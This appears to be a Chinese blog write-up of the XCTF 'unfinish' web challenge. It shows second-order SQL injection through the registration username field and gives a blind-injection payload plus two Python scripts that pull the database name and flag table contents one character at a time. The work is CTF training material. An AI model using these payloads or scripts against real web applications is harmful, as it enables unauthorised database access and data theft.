攻防世界-unfinish(再遇SQL)

最新推荐文章于 2024-07-19 17:34:15 发布
最新推荐文章于 2024-07-19 17:34:15 发布
阅读量1.4k 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44402100/article/details/133005125
版权

打开实验环境:

实验准备:Firefox 或 Chrome、python环境、御剑(用于扫描目录)

非必须准备(不准备这个也能做题):Burp(SQL注入利器)、Vscode 或 Pycharm(用于写python脚本)、火狐代理工具 ProxySwitcheroo

关于浏览器开启本地代理的就不截图了;

默认进入的是登录页面;login.php

打开御剑扫描目录:

 

 看到了注册的地址;在双击打开

 随便注册个账号吧;

 

 这里面没有其他提示,还把用户名输出了,所以就猜测这里存在用户名注入漏洞;

 这边开启好了代理,打开Burp,点击为 on ,Burp准备好了,点击火狐浏览器的注册,把表单发过去;

 

 上面图片里讲了很多,直接操作了;

 这个操作是错误的,尝试了很久,这里提交的 邮箱、用户名 需要进行URL编码 ;这样提交才能成功;

举个栗子:

0'+ascii(substr((select database()) from 1 for 1))+'0

0%27%2Bascii%28substr%28%28select+database%28%29%29+from+1+for+1%29%29%2B%270

不进行URl编码 ,他直接跳转到 注册页面;也就是注册失败;

不试这个了,打开Vscode用脚本跑吧;

先做题前预习吧;

因为这是注册账号,然后数据库读取账号名,触发的SQL查询;

所以 写 pyload的时候 要使用 select ……for ;为啥? 这是因为 mysql数据库的安全机制;当某个表内数据被操作的时候,不允许再对它使用其他命令;

(就像是我在超市买东西,我放到购物车里的火腿肠,这个火腿只剩一个了,现在暂时去别处拿东西,然后有的家伙也喜欢这个火腿,他就拿走了,这是不友好的)

(msyql数据库就是这个意思,for 是啥呢,就是 那个家伙找到我,他说没有这个火腿他活不下去,我就给了通过 for 语句告诉他,你拿走吧,没关系的,好好活着!)

推荐俩个帮助理解链接:李秋读书人

import requests
import re as r
re = requests.session()
url = 'http://220.249.52.133:47596/'
def register(email,username):
    url1 = url+'register.php'
    data = dict(email=email,username=username,password='123456')
    html = re.post(url=url1,data=data)
    html.encoding = 'utf-8'
    return html
def login(email):
    url2 = url+'login.php'
    data = dict(email=email,password='123456')
    html = re.post(url=url2,data=data)
    html.encoding = 'utf-8'
    return html
db = ''
table = ''
for i in range(1,10):         #取数据库名
    pyload = "0'+ascii(substr((select database()) from %d for 1))+'0"%i
    email = "admin@ad.cn"+str(i)
    html = register(email,pyload)
    html = login(email)
    match = r.search(r'<span class="user-name">\s*(\d*)\s*</span>',html.text)
    asc = match.group(1)
    if asc == '0':
        break
    db = db + chr(int(asc))
print('database:',db)

 代码中有提到,这是取数据库名的脚本!

 看到了,数据库名;

表名 flag (猜的),没办法了;下面提到 为啥 就 爆不出表名;

用表名拿 flag:中间注释的是爆数据库的,以及俩句想要爆数据表的(真是想想);

import requests
import re as r
re = requests.session()
url = 'http://220.249.52.133:47596/'
def register(email,username):
    url1 = url+'register.php'
    data = dict(email=email,username=username,password='123456')
    html = re.post(url=url1,data=data)
    html.encoding = 'utf-8'
    return html
def login(email):
    url2 = url+'login.php'
    data = dict(email=email,password='123456')
    html = re.post(url=url2,data=data)
    html.encoding = 'utf-8'
    return html
db = ''
table = ''
# for i in range(1,10):         #取数据库名
#     pyload = "0'+ascii(substr((select database()) from %d for 1))+'0"%i
#     email = "admin@ad.cn"+str(i)
#     html = register(email,pyload)
#     html = login(email)
#     match = r.search(r'<span class="user-name">\s*(\d*)\s*</span>',html.text)
#     asc = match.group(1)
#     if asc == '0':
#         break
#     db = db + chr(int(asc))
# print('database:',db)
for i in range(1,50):           #取表名     information_schema.tables 被过滤; mysql.innodb_table_stats  mysql.innodb_index.stats
    # pyload = "0'+ascii(substr((select group_concat(table_name) from mysql.innodb_index_stats where table_schema=database()) from %d for 1))+'0"%i
    # pyload = "0'+ascii(substr((select * from flag) from %d for 1))+'0"%i
    pyload = "0'+ascii(substr((select * from flag) from %d for 1))+'0"%i
    email = "admin4@ad.cn"+str(i)
    html = register(email,pyload)
    html = login(email)
    match = r.search(r'<span class="user-name">\s*(\d*)\s*</span>',html.text)
    asc = match.group(1)
    if asc == '0':
        break
    table += chr(int(asc))
print('table_name:',table)

怎么配置python环境,以及配置Vscode的python环境都不说了,我感觉这难不住强大的你;下面说说爆表名为啥不行!

 在最后扫尾解释一点脚本的意思吧;

 有道云笔记

笑刀刘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界Web:unfinish
Light_inthe_eyes的博客
10-20 294
打开页面后,是一个登录页面: 用御剑扫一扫,发现有注册页面: 用burpsuite抓注册页面: 尝试构造sql盲注语句:username=1' and left(database(),1)>'a'# 得到结果为nnnnoooo!!!过滤了很多 通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord'); 登录成功后语句:SELECT * FROM tables WHERE email = ''$em
攻防世界 web高手进阶区 6分题(ics-07、unfinish、i-got-id-200)
闵行小鱼塘
08-02 840
继续ctf的旅程,攻防世界web高手进阶区的6分题:ics-07、unfinish、i-got-id-200
攻防世界----unfinish
qq_44418229的博客
08-02 614
攻防世界--unfinish SQL的二次注入
【愚公系列】2023年06月 攻防世界-Web(unfinish)
时光隧道
06-15 4244
SQL注入是一种常见的攻击方式,它利用web应用程序漏洞,通过向Web应用程序提交恶意的SQL语句,从而获得对数据库的访问权限。SQL注入常见的攻击方式包括:基于错误的注入攻击(error-based):通过构造报错语句,把数据库中的错误信息暴露给攻击者,从而获取敏感信息。基于盲注的攻击(blind-based):攻击者无法直接从Web应用程序获得数据库中的信息,但是他们可以通过提交变异的查询,来判断查询结果是否正确,进而推断出数据库中的信息。
攻防世界-web-unfinish-从0到1的解题历程writeup
CTF小白的博客
04-18 5532
题目分析 题目描述为:SQL 题目主要功能界面分析: 主要分为注册、登陆、以及成功登陆后的一个界面。 通过描述可以知道题目应该存在SQL注入漏洞。 扫描得知注册界面存在SQL注入漏洞 尝试构造sql盲注语句如下 {‘username’: “1’ and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1)...
攻防世界web进阶区unfinish详解
hxhxhxhxx的博客
08-09 3991
攻防世界web进阶区unfinish详解题目详解 题目 详解 我们使用御剑,扫描一波 我们进入注册页面查看,发现这个,有注册的话猜一下二次注入(这里注入,然后去页面看结果) 我们先拿AWVS试试, 哦~我的上帝,它存在注入 我们试试,burp的fuzz看看他过滤了什么 还是过滤了蛮多的 这些是都没过滤的 既然知道了他是sql注入 那么我们为啥不用sqlmap呢 我们使用sqlmap,发现只能知道这里有注入点,但是过滤很严重 我们需要找找合适的tamper 哦~我的上帝,果然不行,看来还得看看师
攻防世界 WEB unfinish
qq_41696858的博客
08-31 137
这题考的是sql注入里的二次注入 看了半天login界面,发现没什么好利用的,考虑是否其他页面有可供利用的注入点 先用dirsearch扫一波,发现register页面,这个页面里多了一个username参数,那么这就是我们这题的关键点,在注册完成后,登录, username会在主页里面回显,而且login界面显然没有对username做过滤, 所以手动尝试payload:1’+'1 只要登陆成功后页面回显的username是2,就说明二次注入成立 下面就是爆破问题 由于过滤了一堆关键字,所以需要通过asc
攻防世界 unfinish
CyhDl666的博客
02-25 511
题目描述:sql注入 访问进去是个登录页面 dirsearch扫描了一下 访问register.php 注册了个账号 登录进去好像没什么用 返回登录页面 但是 这里我想到了一个注入方式 在我写sql注入基础知识的时候提到过 但是 没有仔细研究 二次注入 这里注入的点应该是在register.php页面中的name中 因为邮箱和密码还需要登录时候使用 具体可以看我前面的文章 单引号注册失败了 于是我将用户名改为root' and '1这里注册成功了 也就是说这里的闭合方式应该是单引号闭合 且没有我之前学.
攻防世界-web高手进阶区
zji
04-25 4902
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
Part_CAE_Unfinish.rar
06-15
《UG在有限元分析中的应用初探》 在现代工程设计中,有限元分析(Finite Element Analysis,简称FEA)是一种广泛使用的数值方法,用于解决各种...通过不断地学习和实践,相信每个初学者都能在有限元的世界中游刃有余。
微信小程序 setData 对 data数据影响问题
10-17
uniqueitem: (id == 'unfinish') ? this.data.itemleft[index] : this.data.itemright[index], baninput: (id == 'unfinish')?false:true }); var that = this; wx.getStorage({ key: 'item', success: ...
PostgreSQL异常:An I/O error occurred while sending to the backend
IT后浪的博客
07-19 263
在使用PostgreSQL数据库批量写入数据的时候,到了一个问题,异常内容如下:Cause: org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
SQL Server设置定时作业调度Schedule
Cachel Wood的博客
07-15 391
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
SQL执行流程、SQL执行计划、SQL优化
最新发布
风中的默默
07-19 143
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
【MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 230
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 1053
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
PostgreSQL 中如何解决因大量并发插入导致的主键冲突?
技术笔记
07-16 978
在 PostgreSQL 中,解决因大量并发插入导致的主键冲突问题是一个重要的任务。我们可以通过使用唯一索引、序列、批量插入与事务处理、分区表和优化业务逻辑等方法来避免主键冲突的发生。这些方法各有优缺点,我们需要根据实际情况选择合适的解决方案。🎉相关推荐🍅关注博主🎗️带你畅游技术世界,不错过每一次成长机会!📚领书:PostgreSQL 入门到精通.pdf📙PostgreSQL 中文手册📘PostgreSQL 技术专栏🍅CSDN社区-墨松科技。
oceanbase架构、功能模块、数据存储、特性、sql流转层等概念详解
wangleshisei的博客
07-19 722
一般情况下,地域指的是 IDC 所在的城市。合并一般是由每个租户的 RS 根据写入状态或者用户设置发起调度,每个租户的每次合并都会选取一个全局的快照点,租户内所有的分区都会用这个快照点的数据做一次 Major Compaction,这样每次合并租户所有的数据都基于这个统一的快照点生成相应的 SSTable,通过这个机制不仅能帮助用户定期整合增量数据,提升读取性能,同时还提供了一个天然的数据校验点,通过全局的一致位点,OceanBase 数据库能够在内部对多副本以及主表索引表进行多维度的物理数据校验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值